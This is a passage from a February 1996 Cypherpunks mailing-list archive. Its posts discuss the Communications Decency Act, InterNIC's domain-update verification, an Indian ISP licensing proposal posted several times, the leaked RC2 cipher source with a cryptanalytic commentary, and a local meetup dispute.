Or does that soley apply to abortion drugs?  Immoral is a pretty vague
word legally...

[..]
        
>        (a) any obscene, lewd, lascivious, or filthy book, pamphlet, picture,
>motion-picture film, paper, letter, writing, print, or other matter of
>indecent character; or

So much for good foreign films...

>        (b) any obscene, lewd, lascivious, or filthy phonograph recording,
>electrical transcription, or other article or thing capable of producing
>sound; or

Whoopie cuishins would be illegal.

[..]







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rishab Aiyer Ghosh <rishab@best.com>
Date: Sat, 3 Feb 1996 00:36:08 +0800
To: dm@amsterdam.lcs.mit.edu (David Mazieres)
Subject: Re: Domain registration
In-Reply-To: <199602011939.OAA23286@amsterdam.lcs.mit.edu>
Message-ID: <199602021550.HAA23942@shellx.best.com>
MIME-Version: 1.0
Content-Type: text/plain


David, as I wrote earlier, iyou only get fast responses
from InterNIC if your application is _perfect_ - you
might have used an older form, or misplaced your commas
or something.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rishab Aiyer Ghosh <rishab@best.com>
Date: Sat, 3 Feb 1996 00:37:26 +0800
To: dm@amsterdam.lcs.mit.edu (David Mazieres)
Subject: Re: Domain hijacking, InterNIC loopholes
In-Reply-To: <199602011934.OAA23195@amsterdam.lcs.mit.edu>
Message-ID: <199602021556.HAA27293@shellx.best.com>
MIME-Version: 1.0
Content-Type: text/plain


David Mazieres wrote:
> How can you say there are no routers?  The verification process is a
> confirmation E-mail message.  To intercept this you must compromise a
> router, a nameserver, or the host on which the domain administrator
> reads mail.  Since there often are multiple domain administrators
> on different networks, I stand my my statement that it would require
> multiple active attacks, etc.

The confirmation message is sent to the address
requesting an update. This could be anyone. To take
a real example, my dxm.org domain was modified by
hostmaster@best.com - neither the existing admins,
nor root@dxm.org received any confirmation, as the request
was sent from another address. The InterNIC does NOT
require domain update requests to be sent by admins - 
that is, in fact, the simplest level of authentication
that will be introduced by the InterNIC Guardian Object.

Rishab




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "banjo, lord of the c monkeys" <kelli@zeus.towson.edu>
Date: Fri, 2 Feb 1996 21:53:02 +0800
To: Bruce Baugh <bruce@aracnet.com>
Subject: CDA as a tool (was: Re: Helping the Crypto-Clueless)
In-Reply-To: <2.2.32.19960202095316.0069c6a8@mail.aracnet.com>
Message-ID: <Pine.ULT.3.91.960202075232.3155A-100000@zeus.towson.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 2 Feb 1996, Bruce Baugh wrote:

> While talking with Alan Olsen about the impending Telecommunications Decency
> Act, a thought struck me: one of the groups that's really going to be hurt
> by this is pagans. Me, I'm one o' them Christian types; it's my anarchism
> that'll get me on lists. But insofar as cypherpunks have contact with pagans
> (and aboriginal American groups and the like), probably there are a lot of
> folks who should be ramping up for privacy right away.
> 

I agree:  and in addition to that, I'd like to say that contrary to the
beliefs of some people on this list, I don't think the CDA is
representative of a legislative body's spiteful action against general
free speech and information; it's far to simple a motivation for
computer-illiterate, re-election minded professional politicians.  They
simply don't know enough about the nature of the internet itself to
conspire to something as abstract as all that.  I believe that every
congress critter had a specific social enemy in mind when he/she voted for
that bill; somebody who they've been using as their banner, whom they vow
to fight against when re-elected. 

Pagans are a good example of a group likely to be the victims of such 
political action.  I, as an activist in the field, ask you to imagine the
consequenses for the gay civil rights movement, when even discussing the 
issue is viewed as 'indecent or immoral' by some of the more conservative 
lawmakers.  Remember when Canada banned the import of pornography, even the 
news-oriented gay and lesbian publications were halted at the border.  

The crypto relevance in this post is the value of examples such as these 
when explaining to your friends why they need 
non-government-escrowed crypto so badly in electronic discourse.  People 
tend to see the need for it a bit more when they see the threat more 
clearly.  I'm a college student, and while not all my friends are 
involved in the same pursuits I am, most of them are at least loosely 
associated with groups which are considered undesireable by some 
government types (Black Activists, Jewish Activists, Pro Life/Choice 
advocates, etc).  In college, who isn't?

I don't post too often to cypherpunks, so if this view is overly 
simplistic, right on the mark, or completely wrong, send me some mail, 
and we'll discuss.



Kathleen M. Ellis     http://zeus.towson.edu/~kelli/     kelli@zeus.towson.edu
Diverse Sexual Orientation Coll.  Towson State University  DSOC@zeus.towson.edu
"I can't help it, I'm a born lever-puller"
							-Ringo
						     from "Yellow Submarine"
"Your friends are really just enemies who don't have the guts to kill you"
       							-J. Tenuta
"Obscenity is a crutch for inarticulate motherfuckers."
							-Fortune Cookie
						Courtesy of Linux 1.3.45	






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rishab Aiyer Ghosh <rishab@best.com>
Date: Sun, 4 Feb 1996 05:13:45 +0800
Subject: No Subject
Message-ID: <199602021638.IAA18451@shellx.best.com>
MIME-Version: 1.0
Content-Type: text/plain


India's Department of Telecommunications (DoT) charges a licence
fee of $50,000 per _annum_ for BBS operators, and nearly twice
as much for e-mail providers. It is preparing to finalise a policy
for Internet service providers; as it doesn't understand the distintion
between Internet _networks_ (MCI, Sprintnet etc) and "retail" providers
(the geek in the garage), it is planning to charge well over $100,000
in annual licence fees. This is totally against the opinions of Telecom
Secretary R K Takkar, as expressed to my newsletter, The Indian 
Techonomist, some months ago. 

I spoke to Mr Takkar for some time, providing him the "education" that 
he asked for in my newsletter and that large datacom companies here have 
been curiously averse to give him. He appreciated my point of view, and
invited me to send a proposal for an alternative datacom policy, which
I have done (and which is summarised below). I hope to meet him next week 
to follow this up. As a major part of my call for removing restraints is 
based on the Internet's treatment by other world governments, I would like 
letters of support to show this. 

My proposal may appear tame, but it isn't really. It will allow small
ISPs to pay as little as $150 a year in licence fees; reduce the (high)
likelihood of cartels between large companies; and entrench electronic
free-speech at (some) parity with other media. (Note that the DoT has
said that it is "not considering" blocking access to parts of the Net
for reasons of morals or security. This despite the local media's loudly
proclaimed discovery that the Net is 97.34% paedophile, or whatever.)

     Highlights
     
     1. Definitions
     - The category for E-mail providers becomes redundant,
       leaving international gateway, national network, and
       "retail" service providers
     - Content providers have constitutional protection as
       electronic publishers
     - BBSes do not require licensing, being content providers
     
     2. Goals
     - Licence fees not for revenue generation, but to
       ensure responsibility (unavoidable. Mr Takkar's words)
     - Licence fees based on telecom infrastructure costs,
       not revenues (at the moment, a licence is almost like income tax)
     - Regulation required for free and fair competition (see below)
     - TRAI should also handle datacom regulation, and datacom consumer
       complaints (the Telecom Regulatory Authority of India is likely
       to be very independent of the government, headed by a former
       Supreme Court judge)
     
     3. Regulation
     - Equal access to gateway, network and service
       providers (to prevent denial of service and cartels, very
       likely here without explicit rules preventing them)
     - Rationalisation of DoT leased line tariff structure
       (now, a network costs more than the sum of its parts! too 
       complicated to explain briefly)
     
     4. Licensing
     - Uniform fee structure for gateway, network and
       service providers (say 2.5% of leased line costs, which
       are known as they are provided by the DoT)
     - Barriers to entry greatly reduced (minimal ISP pays $150 p.a)
     - However, total licence fee revenue for DoT not
       significantly reduced (important for success of this proposal;
       large nationwide network may still pay $100,000+ thanks to its
       huge leased line requirements)
     
The full text of the proposal will be made publicly available on the
Net sometime next week. Those who would like to see it, and a template
for a letter of support, should send me mail at dcom-appeal@dxm.org.
I would like letters from non-commercial organisations, lobby groups,
policy bodies, and so on, but NOT datacom companies (I wouldn't
mind _personal_ letters of support from them, but they wouldn't do
for the DoT). I would particularly like to see something from Hong Kong,
which I have used as a good example of how to do things in Asia.

Thanks,
Rishab

----------------------------------------------------------------------
The Indian Techonomist - newsletter on India's information industry
http://dxm.org/techonomist/                             rishab@dxm.org
Editor and publisher: Rishab Aiyer Ghosh           rishab@arbornet.org
Vox +91 11 6853410; 3760335;     H 34 C Saket, New Delhi 110017, INDIA




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rishab Aiyer Ghosh <rishab@best.com>
Date: Sat, 3 Feb 1996 01:14:04 +0800
Subject: No Subject
Message-ID: <199602021642.IAA20236@shellx.best.com>
MIME-Version: 1.0
Content-Type: text/plain


India's Department of Telecommunications (DoT) charges a licence
fee of $50,000 per _annum_ for BBS operators, and nearly twice
as much for e-mail providers. It is preparing to finalise a policy
for Internet service providers; as it doesn't understand the distintion
between Internet _networks_ (MCI, Sprintnet etc) and "retail" providers
(the geek in the garage), it is planning to charge well over $100,000
in annual licence fees. This is totally against the opinions of Telecom
Secretary R K Takkar, as expressed to my newsletter, The Indian 
Techonomist, some months ago. 

I spoke to Mr Takkar for some time, providing him the "education" that 
he asked for in my newsletter and that large datacom companies here have 
been curiously averse to give him. He appreciated my point of view, and
invited me to send a proposal for an alternative datacom policy, which
I have done (and which is summarised below). I hope to meet him next week 
to follow this up. As a major part of my call for removing restraints is 
based on the Internet's treatment by other world governments, I would like 
letters of support to show this. 

My proposal may appear tame, but it isn't really. It will allow small
ISPs to pay as little as $150 a year in licence fees; reduce the (high)
likelihood of cartels between large companies; and entrench electronic
free-speech at (some) parity with other media. (Note that the DoT has
said that it is "not considering" blocking access to parts of the Net
for reasons of morals or security. This despite the local media's loudly
proclaimed discovery that the Net is 97.34% paedophile, or whatever.)

     Highlights
     
     1. Definitions
     - The category for E-mail providers becomes redundant,
       leaving international gateway, national network, and
       "retail" service providers
     - Content providers have constitutional protection as
       electronic publishers
     - BBSes do not require licensing, being content providers
     
     2. Goals
     - Licence fees not for revenue generation, but to
       ensure responsibility (unavoidable. Mr Takkar's words)
     - Licence fees based on telecom infrastructure costs,
       not revenues (at the moment, a licence is almost like income tax)
     - Regulation required for free and fair competition (see below)
     - TRAI should also handle datacom regulation, and datacom consumer
       complaints (the Telecom Regulatory Authority of India is likely
       to be very independent of the government, headed by a former
       Supreme Court judge)
     
     3. Regulation
     - Equal access to gateway, network and service
       providers (to prevent denial of service and cartels, very
       likely here without explicit rules preventing them)
     - Rationalisation of DoT leased line tariff structure
       (now, a network costs more than the sum of its parts! too 
       complicated to explain briefly)
     
     4. Licensing
     - Uniform fee structure for gateway, network and
       service providers (say 2.5% of leased line costs, which
       are known as they are provided by the DoT)
     - Barriers to entry greatly reduced (minimal ISP pays $150 p.a)
     - However, total licence fee revenue for DoT not
       significantly reduced (important for success of this proposal;
       large nationwide network may still pay $100,000+ thanks to its
       huge leased line requirements)
     
The full text of the proposal will be made publicly available on the
Net sometime next week. Those who would like to see it, and a template
for a letter of support, should send me mail at dcom-appeal@dxm.org.
I would like letters from non-commercial organisations, lobby groups,
policy bodies, and so on, but NOT datacom companies (I wouldn't
mind _personal_ letters of support from them, but they wouldn't do
for the DoT). I would particularly like to see something from Hong Kong,
which I have used as a good example of how to do things in Asia.

Thanks,
Rishab

----------------------------------------------------------------------
The Indian Techonomist - newsletter on India's information industry
http://dxm.org/techonomist/                             rishab@dxm.org
Editor and publisher: Rishab Aiyer Ghosh           rishab@arbornet.org
Vox +91 11 6853410; 3760335;     H 34 C Saket, New Delhi 110017, INDIA




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rishab Aiyer Ghosh <rishab@best.com>
Date: Tue, 6 Feb 1996 08:49:39 +0800
To: Cypherpunks Lite <cp-lite@comsec.com>
Subject: No Subject
Message-ID: <199602052258.OAA25368@comsec.com>
MIME-Version: 1.0
Content-Type: text/plain


India's Department of Telecommunications (DoT) charges a licence
fee of $50,000 per _annum_ for BBS operators, and nearly twice
as much for e-mail providers. It is preparing to finalise a policy
for Internet service providers; as it doesn't understand the distintion
between Internet _networks_ (MCI, Sprintnet etc) and "retail" providers
(the geek in the garage), it is planning to charge well over $100,000
in annual licence fees. This is totally against the opinions of Telecom
Secretary R K Takkar, as expressed to my newsletter, The Indian 
Techonomist, some months ago. 

I spoke to Mr Takkar for some time, providing him the "education" that 
he asked for in my newsletter and that large datacom companies here have 
been curiously averse to give him. He appreciated my point of view, and
invited me to send a proposal for an alternative datacom policy, which
I have done (and which is summarised below). I hope to meet him next week 
to follow this up. As a major part of my call for removing restraints is 
based on the Internet's treatment by other world governments, I would like 
letters of support to show this. 

My proposal may appear tame, but it isn't really. It will allow small
ISPs to pay as little as $150 a year in licence fees; reduce the (high)
likelihood of cartels between large companies; and entrench electronic
free-speech at (some) parity with other media. (Note that the DoT has
said that it is "not considering" blocking access to parts of the Net
for reasons of morals or security. This despite the local media's loudly
proclaimed discovery that the Net is 97.34% paedophile, or whatever.)

     Highlights
     
     1. Definitions
     - The category for E-mail providers becomes redundant,
       leaving international gateway, national network, and
       "retail" service providers
     - Content providers have constitutional protection as
       electronic publishers
     - BBSes do not require licensing, being content providers
     
     2. Goals
     - Licence fees not for revenue generation, but to
       ensure responsibility (unavoidable. Mr Takkar's words)
     - Licence fees based on telecom infrastructure costs,
       not revenues (at the moment, a licence is almost like income tax)
     - Regulation required for free and fair competition (see below)
     - TRAI should also handle datacom regulation, and datacom consumer
       complaints (the Telecom Regulatory Authority of India is likely
       to be very independent of the government, headed by a former
       Supreme Court judge)
     
     3. Regulation
     - Equal access to gateway, network and service
       providers (to prevent denial of service and cartels, very
       likely here without explicit rules preventing them)
     - Rationalisation of DoT leased line tariff structure
       (now, a network costs more than the sum of its parts! too 
       complicated to explain briefly)
     
     4. Licensing
     - Uniform fee structure for gateway, network and
       service providers (say 2.5% of leased line costs, which
       are known as they are provided by the DoT)
     - Barriers to entry greatly reduced (minimal ISP pays $150 p.a)
     - However, total licence fee revenue for DoT not
       significantly reduced (important for success of this proposal;
       large nationwide network may still pay $100,000+ thanks to its
       huge leased line requirements)
     
The full text of the proposal will be made publicly available on the
Net sometime next week. Those who would like to see it, and a template
for a letter of support, should send me mail at dcom-appeal@dxm.org.
I would like letters from non-commercial organisations, lobby groups,
policy bodies, and so on, but NOT datacom companies (I wouldn't
mind _personal_ letters of support from them, but they wouldn't do
for the DoT). I would particularly like to see something from Hong Kong,
which I have used as a good example of how to do things in Asia.

Thanks,
Rishab

----------------------------------------------------------------------
The Indian Techonomist - newsletter on India's information industry
http://dxm.org/techonomist/                             rishab@dxm.org
Editor and publisher: Rishab Aiyer Ghosh           rishab@arbornet.org
Vox +91 11 6853410; 3760335;     H 34 C Saket, New Delhi 110017, INDIA





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rishab@dxm.org (Rishab Aiyer Ghosh)
Date: Sat, 3 Feb 1996 01:32:20 +0800
To: cypherpunks@toad.com
Subject: Germany, China, but not India?
Message-ID: <199602021643.IAA20927@shellx.best.com>
MIME-Version: 1.0
Content-Type: text/plain


Sorry if this post got screwed up the first time.


In the context of recent events in Germany and China, it is
interesting to note that, despite horrid rumours about high license
fees for ISPs, the Indian government is "not considering" blocking 
portions of the Net for security or moral reasons. The Telecom 
Secretary appears relatively progressive, and has invited me to 
send an alternative proposal for datacom policy. I would like 
letters of support: read on.

-Rishab


India's Department of Telecommunications (DoT) charges a licence
fee of $50,000 per _annum_ for BBS operators, and nearly twice
as much for e-mail providers. It is preparing to finalise a policy
for Internet service providers; as it doesn't understand the distintion
between Internet _networks_ (MCI, Sprintnet etc) and "retail" providers
(the geek in the garage), it is planning to charge well over $100,000
in annual licence fees. This is totally against the opinions of Telecom
Secretary R K Takkar, as expressed to my newsletter, The Indian 
Techonomist, some months ago. 

I spoke to Mr Takkar for some time, providing him the "education" that 
he asked for in my newsletter and that large datacom companies here have 
been curiously averse to give him. He appreciated my point of view, and
invited me to send a proposal for an alternative datacom policy, which
I have done (and which is summarised below). I hope to meet him next week 
to follow this up. As a major part of my call for removing restraints is 
based on the Internet's treatment by other world governments, I would like 
letters of support to show this. 

My proposal may appear tame, but it isn't really. It will allow small
ISPs to pay as little as $150 a year in licence fees; reduce the (high)
likelihood of cartels between large companies; and entrench electronic
free-speech at (some) parity with other media. (Note that the DoT has
said that it is "not considering" blocking access to parts of the Net
for reasons of morals or security. This despite the local media's loudly
proclaimed discovery that the Net is 97.34% paedophile, or whatever.)

     Highlights
     
     1. Definitions
     - The category for E-mail providers becomes redundant,
       leaving international gateway, national network, and
       "retail" service providers
     - Content providers have constitutional protection as
       electronic publishers
     - BBSes do not require licensing, being content providers
     
     2. Goals
     - Licence fees not for revenue generation, but to
       ensure responsibility (unavoidable. Mr Takkar's words)
     - Licence fees based on telecom infrastructure costs,
       not revenues (at the moment, a licence is almost like income tax)
     - Regulation required for free and fair competition (see below)
     - TRAI should also handle datacom regulation, and datacom consumer
       complaints (the Telecom Regulatory Authority of India is likely
       to be very independent of the government, headed by a former
       Supreme Court judge)
     
     3. Regulation
     - Equal access to gateway, network and service
       providers (to prevent denial of service and cartels, very
       likely here without explicit rules preventing them)
     - Rationalisation of DoT leased line tariff structure
       (now, a network costs more than the sum of its parts! too 
       complicated to explain briefly)
     
     4. Licensing
     - Uniform fee structure for gateway, network and
       service providers (say 2.5% of leased line costs, which
       are known as they are provided by the DoT)
     - Barriers to entry greatly reduced (minimal ISP pays $150 p.a)
     - However, total licence fee revenue for DoT not
       significantly reduced (important for success of this proposal;
       large nationwide network may still pay $100,000+ thanks to its
       huge leased line requirements)
     
The full text of the proposal will be made publicly available on the
Net sometime next week. Those who would like to see it, and a template
for a letter of support, should send me mail at dcom-appeal@dxm.org.
I would like letters from non-commercial organisations, lobby groups,
policy bodies, and so on, but NOT datacom companies (I wouldn't
mind _personal_ letters of support from them, but they wouldn't do
for the DoT). I would particularly like to see something from Hong Kong,
which I have used as a good example of how to do things in Asia.

Thanks,
Rishab

----------------------------------------------------------------------
The Indian Techonomist - newsletter on India's information industry
http://dxm.org/techonomist/                             rishab@dxm.org
Editor and publisher: Rishab Aiyer Ghosh           rishab@arbornet.org
Vox +91 11 6853410; 3760335;     H 34 C Saket, New Delhi 110017, INDIA




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "A. Padgett Peterson, P.E. Information Security" <PADGETT@hobbes.orl.mmc.com>
Date: Fri, 2 Feb 1996 22:27:37 +0800
To: wlkngowl@unix.asb.com
Subject: RE: Telecom Bill may makes abortion talke illegal on the net...
Message-ID: <960202090301.2020ff8d@hobbes.orl.mmc.com>
MIME-Version: 1.0
Content-Type: text/plain



>        (b) any obscene, lewd, lascivious, or filthy phonograph recording,
>electrical transcription, or other article or thing capable of producing
>sound; or

There goes rec.antiques.radio+phono & rec.radio.swap - many of the 
Trans-Oceanics I have bought on-line would qualify as filthy, ever try 
to remove years of accumulated tobbacco smoke residue from the inside 
of a dial-lens ?

Don't forget rec.radio.shortwave - someone in a non-compliant country might 
transmit someting nasty. 

And as for lascivious - there goes the Tex Avery cartoons on Nickelodeon.

Did Nehimiah (sp?) Scudder come up with this ?

						Warmly,
							Padgett




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Karl A. Siil" <karl@cosmos.cosmos.att.com>
Date: Sat, 3 Feb 1996 23:57:55 +0800
To: cypherpunks@toad.com
Subject: Re: RC2 Source Code - Legal Warning from RSADSI
Message-ID: <2.2.32.19960202140459.006d7194@cosmos.cosmos.att.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:00 PM 2/1/96 -0600, Mr. Boffo wrote:
>> WARNING NOTICE > > It has recently come to the attention of RSA Data 

        [ text omitted ]

>secure their own site against break-ins? If they want to be the
>prima-donna site for encryption with all of the "copy-written" crypto,
>you would think that they could protect their own resources better.

I strongly suspect RSA distributes source to those customers who pay enough,
with the caveat that the customers don't share it, of course. My company
does that, even with its most sensitive code (of course, for a lot of money
:-) ). I find it extremely unlikely (from just a probabilistic standpoint)
that this leak came from within RSADSI.

I would first suspect someone of disassembly, of which I am envious. Not
because I couldn't do it, but because I don't have time to install a new
CD-ROM drive, never mind sit down and read hex dumps and assembler.

My second suspect is a disgruntled or "Crypto Freedom Fighter" employee at
some customer's site. If this is the case and the given anonymous remailer's
(or remailers') integrity is (are) not compromised, good luck to RSA in
trying to prosecute: They're gonna need it.

This horse is out of the barn, down the road, and in the next county.

My one question: Who cares about RC2?

                                        Karl





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "baldwin" <baldwin@RSA.COM (Robert W. Baldwin)>
Date: Sat, 3 Feb 1996 01:58:30 +0800
To: cypherpunks@toad.com
Subject: Technical comments on RC2 from John Kelsey
Message-ID: <9601028232.AA823281610@snail.rsa.com>
MIME-Version: 1.0
Content-Type: text/plain


        Here are some interesting technical comments on RC2 from
sci.crypt.  If you already read sci.crypt, delete this now and
accept my apologies for wasting your time.
                --Bob


______________________________ Forward Header __________________________________
From: John Kelsey <jmkelsey@delphi.com> 
Newsgroups: sci.crypt
Subject: Re: RC2 source code
Date: Tue, 30 Jan 96 10:20:43 -0500
Organization: Delphi (info@delphi.com email, 800-695-4005 voice) 

-----BEGIN PGP SIGNED MESSAGE-----

[ To: sci.crypt ## Date: 01/29/96 09:18 pm ##
  Subject: RC2 source code ]

>From: anon-remailer@utopia.hacktic.nl (Anonymous) 
>Newsgroups: sci.crypt
>Subject: RC2 source code
>Date: 29 Jan 1996 06:38:04 +0100

This was interesting.  Is this another "S1," or another 
"alleged-RC4?"  The whole thing looks pretty believeable, i.e., it 
doesn't have any obviously dumb parts that I can see.

Note that alleged RC2's block encryption function looks an awful lot 
like one round of MD5 performed on 16-bit sub-blocks, using the 
bitwise selection function as the nonlinear function, and a 
key-derived constant table.  Additionally, in rounds four and eleven, 
there are four lookups into the expanded key array.

The encryption function could be rewritten as

for(i=0;i<16;i++){
     a = rotl(a + bsel(d,c,b) + *sk++, 1); 
     b = rotl(b + bsel(a,d,c) + *sk++, 2); 
     c = rotl(c + bsel(d,c,b) + *sk++, 3); 
     d = rolt(d + bsel(c,b,a) + *sk++, 5);

     if((i==4)||(i==11)){
          a += xk[d&0x3f];
          b += xk[a&0x3f];
          c += xk[b&0x3f];
          d += xk[c&0x3f];
     }
}

If this is accurate, it may give us some insight into Rivest's 
development of MD4 and MD5, which were radically different than MD2. 
What are the dates on this?  Did Rivest do MD4 or RC2 first?  This 
may be the first block cipher in the commercial/academic world to 
use a UFN structure.  One interesting part of this is the use of the 
subkey array as an S-box twice during the encryption process.  I'm 
curious as to why this would be used only twice, rather than each 
round, i.e.

a += bsel(b,c,d) + *sk++ + s[d&0x3f];

Sticking a very different internal transformation in may have been 
an attempt to make iterative (i.e., differential) attacks harder, 
since there's no longer a single round function through which you 
can pass differential characteristics.  This depends upon when RC2 
was developed and released.

Note that the claim that "RC2 is not an iterative block cipher" 
seems to be based on the fact that it has two instances where a 
different round function is thrown in.  (Essentially, it's actually 
an 18-round cipher with two different round functions, one of which 
is used only twice.)  This other round function isn't very 
impressive, since it uses only six bits of the source block to 
affect the target block.

A one-bit change in a randomly-distributed input block looks
look like it will propogate pretty quickly:  There's a roughly 0.5 
probability that it doesn't make it through the bsel function.  If 
it does, then there's about a 0.5 probability that it will cause a 
change in the carry bit.  This happens four times per "round," so a 
one-bit change should have about a 2^{-8} chance to make it through 
one round as a one-bit change, and so about a 2^{-128} chance to 
make it through all sixteen rounds, assuming no impact from either 
of the two S-box lookups. Does this look right, or am I missing 
something?  (This is a first approximation--if our bit is in the 
high-order position anywhere, then it *can't* cause a carry bit, but 
there's no obvious way to keep it there for long.)  By choosing the 
input block, I can ensure that one-bit XOR difference makes it 
through the first step or two, but that doesn't do too much for an 
actual attack.

Other XOR differences can help with the first round or so, but stop 
being helpful afterward.  It generally looks hard to prevent 
diffusion by choosing other values, at least using XOR differences, 
because each subblock is rotated a different amount in each round. 
(The bits don't keep lining up.)

We can also try to do a differential attack based on subtraction 
modulo 2^16, based partially on Tom Berson's attempt to 
differentially attack MD5 using subtraction modulo 2^32.  This gets 
complicated because of the rotations and the bit selection 
operations, but it ought to be tried if it hasn't already.

The key scheduling is also interesting, and somewhat reminiscent of 
MD2's internal operations.  Each expanded key byte after the first N 
(where N is the number of bytes in the user's key) is determined by 
two bytes--the previous expanded key byte, and the expanded key byte 
N positions back.  This means that we probably don't get ideal 
mixing of the key bytes in the early expanded key bytes, but it 
isn't clear to me that there will be a lot of problems with 
reasonable key lengths.  (Note that a reasonable key length would be 
128 bits=16 bytes, and that it should come from the output of a good 
one-way hash function.)  I wouldn't recommend using the key schedule 
to hash passphrases, since long passphrases would leave us with many 
very low-entropy subkey values.  In general, I think that really 
large user keys will leave us vulnerable to a variety of related-key 
attacks and other nasty stuff.  I'm a little curious as to the 
purpose of phase 2 of the key schedule, but since it's only used 
when a watered-down version of the algorithm is wanted (right?), I 
haven't spent much time looking at it.

Does alleged RC2's key schedule use the same permutation table as 
MD2 does?  For small systems, this might have been a reasonably nice 
space savings.  (On the other hand, if you have a hash function 
available at the same time, it makes sense to go ahead and use it in 
your key schedule, which isn't done here.)

The algorithm looks like it will have reasonable performance on 
16-bit machines like the 8086, which was almost certainly one of the 
requirements for the algorithm, given the times it was used.

Comments?

   --John Kelsey, jmkelsey@delphi.com / kelsey@counterpane.com
 PGP 2.6 fingerprint = 4FE2 F421 100F BB0A 03D1 FE06 A435 7E36

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMQ43Q0Hx57Ag8goBAQG0LQQAiohrNSPvKzSIJjMeWjrK/r7HZOWp0Mhg 
zcq60rIyPMpsDnxuk7VlLrU2XBy0Aff4QpO8jORS3VFKtaLH5XJehc7WTZF+1En1 
ux4prro+Gpvn99HToTqKa6igxlEGYShskoF/aBIkszZAg6m/P92BPyZ/PW3tnMtp 
MoMcdNGcO0I=
=ttGl
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Patrick Lamb <pdlamb@iquest.com>
Date: Fri, 2 Feb 1996 23:57:13 +0800
To: "baldwin" <baldwin@RSA.COM (Robert W. Baldwin)>
Subject: Re: RC2 Source Code - Legal Warning from RSADSI
Message-ID: <199602021529.JAA15348@vespucci.iquest.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:06 2/1/96 PST, you wrote:
>
>WARNING NOTICE
>
>        It has recently come to the attention of RSA Data
>Security, Inc. that certain of its confidential and
>proprietary source code has been misappropriated and
>disclosed.  Despite such unauthorized use and disclosure,
>RSA Data Security reserves all intellectual property rights
>in such source code under applicable law, including without
>limitation trade secret and copyright protection.  

(Remainder of warning elided.)

Does this mean RSADSI is claiming copyright infringement on the RC2 source code?

        Pat
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQENAzACleQAAAEH/2+41W3bZPuWU1gv6A0bq3a57bgCiCAbU1QY41f+NI1I8i/+
a/L314RIpCR0iCZhsNMHNI9rVovsbmOQE4Cf9YYL3cClUoE2VAsLOi9LAjlN8qYc
kmAqpsGQ39eaKrnlC/0lxJtFZgypT4m9UIsTU986y3gyy+ZTWwxtbDaLBEdsTiH/
e+zosoBiXmwWYY1n+5yvaKLGMUwa20AKdoRCUgqhJQpkW0nAvItU6WhaqxwH6JXp
KCNsuP6k8FBmcKZfSSvUphSOIJnARAq9K9UPhj5BeAy1vKZ416jfgeYQUTxHQOMT
rTiQOYR/oAR35gBpGYg6p1lu6Ma5eDPtpBPadUUABRG0IFBhdHJpY2sgTGFtYiA8
cGRsYW1iQGlxdWVzdC5jb20+
=DZzp
-----END PGP PUBLIC KEY BLOCK-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James M. Cobb" <jcobb@ahcbsd1.ovnet.com>
Date: Fri, 2 Feb 1996 22:59:13 +0800
To: dlv@bwalk.dm.com
Subject: Re: "German service cuts Net access" (to Santa Cruz)
Message-ID: <Pine.BSD.3.91.960202091950.25104A-100000@ahcbsd1.ovnet.com>
MIME-Version: 1.0
Content-Type: text/plain


 
 
  Dmitri, 
 
 
  On 01 28 96 you say: 
 
    Heck, any message on the Internet is inherently porno- 
    graphic because it's just a bunch of 1's and 0's.  And 
    we all know that to Sen Exon a 1 looks like a penis and 
    a 0 looks like a vagina! :-)
 
 
  On C-Span, did I hear Senator Kennedy suggest the Senate Ethics 
  Committee delve into Senator Exon for unlawful carnal knowledge 
  of nuclear arithmetic? 
 
 
  Cordially, 
 
  Jim 
 
 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Paul Kanz <paul@icx.com>
Date: Sat, 3 Feb 1996 02:20:59 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: Charter of PDX Cpunk meetings
In-Reply-To: <m0tiGg6-0008zpC@pacifier.com>
Message-ID: <Pine.HPP.3.91.960202090112.25583A-100000@pat2.icx.com>
MIME-Version: 1.0
Content-Type: text/plain



Now, hold on here.  I was at the meeting and I don't know what you are 
referring to as "highly unethical behavior", could you expand this 
for myself and others.

As for "FOR:  I've received commentary which suggests that they believe that
key-signing somehow vouches for the HONESTY of the person involved; not his
IDENTITY."  Unless I'm in the minority, the key-signing process IS NOT a test 
to determine if the person is a 'honest' person, but to ensure that the keys 
where valid and that someone did not make a mistake somewhere.

Keep in mind that the meeting was a mixer, not a board of directors meeting - 
take a chill pill.

-Paul      

On Fri, 2 Feb 1996, jim bell wrote:

> -----BEGIN PGP SIGNED MESSAGE-----
> 
> At 10:52 PM 2/1/96 -0800, Alan Olsen wrote:
> 
> >
> >I requested that this debate be taken to private e-mail.  Since you seem to 
> >not want to do that, and since you insist of making false and unrealistic 
> >claims, 
> 
> Which "false and unrealistic claims"?
> 
> 
> I am removing your name from the subscription list for 
> >pdx-cypherpunks.
> 
> This isn't a DEBATE.  It is a WARNING to all other potential suckers in the 
> Portland Oregon area that Alan Olsen engaged in highly unethical behavior 
> with regards to the recent cypherpunks meeting, flamed me without 
> justification in the national list, failed to respond to security inquiries, 
> failed to deny issues and matters of truth, and failed to properly deal with 
> a situation that he had a responsibility to handle ethically.  Not to 
> mention lying in the comment above.
> 
> I am going to take this to the national list, because you took it there 
> first in your original flame:  I am going to point out that you flamed me 
> for no good reason; you engaged in a "knee-jerk" "debunking" without even 
> knowing what you were ostensibly "debunking,"  that you failed to respond to 
> my polite request for clarification; that you've attempted to pretend that I 
> was somehow at fault for noticing your transgressions; that your local 
